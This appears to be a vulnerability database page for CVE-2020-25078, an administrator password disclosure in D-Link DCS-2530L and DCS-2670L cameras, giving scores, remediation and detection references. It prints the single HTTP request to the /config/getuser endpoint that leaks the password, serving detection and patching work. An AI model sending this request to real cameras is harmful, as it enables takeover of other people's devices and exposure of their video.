🔙 목록으로 돌아가기

CVE-2020-25078: D-Link DCS-2530L/DCS-2670L - Administrator Password Disclosure

TitleD-Link DCS-2530L/DCS-2670L - Administrator Password Disclosure
Authorpikpikcu
SeverityHigh
ImpactAn attacker can obtain the administrator password, potentially leading to unauthorized access and control of the camera.
RemediationUpdate the camera firmware to the latest version to fix the vulnerability.
CVSS Score7.5
EPSS Score0.94229
CVE IDCVE-2020-25078
Tags cve cve2020 dlink kev vkev vuln

🔍 Vulnerability Description

D-Link DCS-2530L before 1.06.01 Hotfix and DCS-2670L through 2.02 devices are vulnerable to password disclosures vulnerabilities because the /config/getuser endpoint allows for remote administrator password disclosure.

🌐 HTTP Request

GET /config/getuser?index=0 HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 14) AppleWebKit/620.32 (KHTML, like Gecko) Version/17.1.10 Safari/620.32
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2020/CVE-2020-25078.yaml

🦈 Packet Capture: ⬇️ Download cve-2020-25078.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A